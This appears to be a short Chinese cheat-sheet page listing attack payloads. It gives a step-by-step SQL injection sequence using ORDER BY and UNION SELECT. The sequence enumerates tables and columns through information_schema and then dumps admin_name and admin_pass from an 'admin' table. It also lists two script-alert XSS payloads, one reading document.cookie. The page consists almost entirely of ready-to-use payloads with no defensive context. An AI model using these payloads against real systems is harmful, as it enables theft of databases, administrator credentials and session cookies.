sql xss
sql payload
1' order by 5 --+
-1' union select 1,2,3,4--+
-1' union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=database() --+
-1' union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name='admin'--+
-1' union select 1,2,group_concat(admin_name,0x7e,admin_pass),4 from admin --+
xss payload
<script>alert(document.cookie)</script>
<script>alert(你的名字)</script>
浙公网安备 33010602011771号